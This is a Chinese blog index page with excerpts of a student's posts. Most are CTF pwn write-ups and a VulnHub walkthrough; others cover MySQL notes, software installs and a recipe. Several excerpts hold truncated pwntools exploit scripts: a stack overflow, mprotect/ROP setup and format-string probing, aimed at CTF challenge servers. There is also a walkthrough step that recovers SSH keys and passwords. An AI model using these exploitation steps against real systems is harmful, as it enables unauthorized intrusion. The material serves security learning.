Dem1的博客

原创 linux系统提权 | tryhackme | Linux PrivEsc

账号密码user。

原创 VulnHub靶机-Funbox2

1.信息搜集：nmap看ftp，ssh，http三大端口，走不通就换条路nmap -sS 攻击机IP/242.ftp匿名登录：anonymous/空密码ftp 靶机IPanonymous/空3.ftp文件下载：wget -r ftp://IP4.join爆破zip5.ftp下载的文件好像都是用户信息，按照hint解压获得id_rsa6.id_rsa用于登录sshssh -i id_rsa A@靶机IP7.尝试提权：mysql_history中有用户密码ls -la。

原创 Windows server 2008 安装vmtools显示需要sp1

安装vmtools

原创 内部文件上传系统漏洞分析溯源

无

原创 ctfshow | 单身杯dsb | pwn | ctfshow_OA

#create user&password -> login -> validate psn session -> from pwn import *p = remote("pwn.challenge.ctf.show",28156)#-----main -> menu#-----from main#-----create_new_userp.sendline('1')p.recvuntil('username :')p.sendline('pwn')#

原创 ctfshow | 单身杯dsb | pwn | pwn签到

from pwn import *p = remote('pwn.challenge.ctf.show',28018)#p =process('./pwn01')shell_here = 0x80484f6payload = 'a'*(0x10+0x4) + p32(shell_here)p.sendline(payload)p.interactive()

原创 ctfshow_pwn03

https://www.bilibili.com/video/av885494681#查看libc地址lbb 文件名

原创 No matched libc, please add more libc or try others

在使用libcsearcher库的时候出现报错弄了很久终于弄好了打开libcSearcher目录下的libcdatabase#删除libcdatabase里的文件rm -rf *#重新安装libcdatabase的东西git clone https://github.com/niklasb/libc-database./get ubuntu #出现报错Requirements for download or update ‘ubuntu’ are not met. Please, refer

转载 [OGeek2019]babyrop

题目分析1.checksec发现只开了NX保护，32位文件2.IDA打开（1）看main函数伪代码由于有sub_80486BB（初始化缓存区函数），所以buf是个随机数（2）看其他函数伪代码①函数中有个字符串比较要绕过，所以要使v10②已知strlen函数的缺陷使遇到\x00直接截断，所以可得输入的第一位数应为\x00③已知buf[7]，且函数中有read(0,buf,0x20u)，此外经计算可得（？）v5buf的第8位，所以可得v5可以被指定④已知a1v5，buf为[ebp-E7

原创 手抓饼攻略

1、有个锅和铲子2、油3、盐4、饼5、沙拉酱6、芝士片7、鸡蛋8、海草1、低温热锅2、先煎好鸡蛋（要提前加点盐）3、煎饼至两面金黄，微微膨胀4、放芝士片，然后翻面5.出炉，包东西

原创 0502经验分享

一、简单搭建环境1.VMware2.安装虚拟机3.配置Linux环境（1）pwntool（2）gdb（3）pwndbg4.必备工具：IDA二、做题流程拿到一道题应该怎么做通常我是这样走流程的1.checksec（其实我不经常用emmm）2.在IDA中先看看字符串有/bin/sh那么十有八九这道题比较简单，没有压力没有的话可能就得…3.看看main函数的伪代码通常函数简单的话，题目也简单，看看相关函数有没有read、printf等等。4.看system的地址（如果有的话），或

原创 [OGeek2019]babyrop | BUUCTF | got表和plt表

一、解题1.sub_80486BB 没用，省略fd=随机数read(fd,&buf,4u);->buf 0x14 4->sub_804871F(buf) ->sub_80487D0(v2)2.sub_804871Fsprintf()v1=strlen(buf) -> 这里可以用\x00截断

原创 MySQL上课笔记 |多表操作

一、多表查询1.联合查询在这里插入代码片2.连接查询（1）交叉连接cross join用于连接两个要查询的表。产生的结果是笛卡尔积，无实际应用意义。select 查询字段 from 表1 [as 表1别名] cross join 表2 [as 表2别名];#[]表示可加可不加#查询字段可以为”别名.字段名“#cross join可以用,代替（2）内连接根据匹配条件，返回表1和表2匹配成功的记录。select 查询字段 from 表;[inner] join 表2 on 匹配条

转载 get_started_3dsctf_2016 | PWN | BUUCTF | mprotect函数

【声明：我不会做，所以学习别人的看看能不能看懂】from pwn import *context(arch='i386',os='linux')r=remote('node4.buuoj.cn',29114)elf=ELF('./get_started_3dsctf_2016')mprotect_addr=elf.symbols['mprotect']read_addr=elf.symbols['read']main_addr=elf.symbols['main']ppp3_addr=0x

原创 [第五空间2019 决赛]PWN5 | BUUCTF | 格式化字符串 | 计算偏移量

正经wpfrom pwn import*p=remote("node4.buuoj.cn",29506)bssaddr = 0x804c044#binaddr = 0x0804932F#1 #payload = 'aaaa-%x-%x-%x-%x-%x-%x-%x-%x-%x-%x-%x-%x-%x-%x-%x-%x'## aaaa-ffb14fe8-63-0-ffb1500e-3-c2-f7e9791b-ffb1500e-ffb1510c-61616161-2d78252d-252d78

原创 MySQL创建数据表 | 开局一条龙

mysql -u root #登录create database chapcher04; #创建数据库show databases; #查看数据库use chapcher04; #使用该数据库create table sh_goods(id int(10) unsigned primary key auto_increment, #主键+自动增长categoryid int(10) unsigned not null default 0, #非空+0spuid int(10) uns

原创 MySQL | 安装过程

下载(可以直接点击下载中第4步的链接，本文主要是提供下载软件的思路和完整过程)1、进入MySQL官网（https://www.mysql.com/）2、点击“DOWNLOADS”3、点击“MySQL Community (GPL) Downloads »”4、点击“MySQL Community Server”（下载的是社区版~）（由于个人需要，所以我下载的是5.7.36-win64版本的，似乎大家都是下载最新版本8.0.28的，注意一下，如果点击download出现其他界面，直接选择“no

原创 学习怎么磁盘恢复？_ ？实验1

原创 Visual Studio安装

下载官网下载Community 2022版本安装时选择“使用C++的桌面开发”注意底下有个修改位置的选项，想安装到D盘的记得修改位置点击“安装”点击“创建新项目”点击“空项目”后面点“创建”就可以了（也可以修改一下项目名称和存储位置）点击“源文件”，添加“新建项目”点击“C++文件”，然后命个名（后缀cpp也可以改成c）点击“添加”然后写个程序，点击“开始执行（不调试）”这个按钮，就可以成功运行程序了...

原创 SageMath | Crypto Tool

安装SageMath官网点击Downloademmm我随便选了一个我打算下载到本机，所以选择了Windows的挑了一个最新的下载，800多MB，下的挺快的（打算把安装包扔到U盘里，但U盘还没到货QAQ）小声哔哔：我看了一下home directory（主目录）没放东西，但是destination location（目标位置）塞了很多东西一个是类似于Python的那种交互式的编辑器一个是shell用来安装一些其他的python库一个是notebook在默认浏览器里打开一个窗口（平

原创 2022年的第一次练习之winter篇

emmm由于没有做笔记，导致，我已经忘记我对我的电脑做过什么，究竟下过什么软件，搭建过什么环境，一切已经重归于零......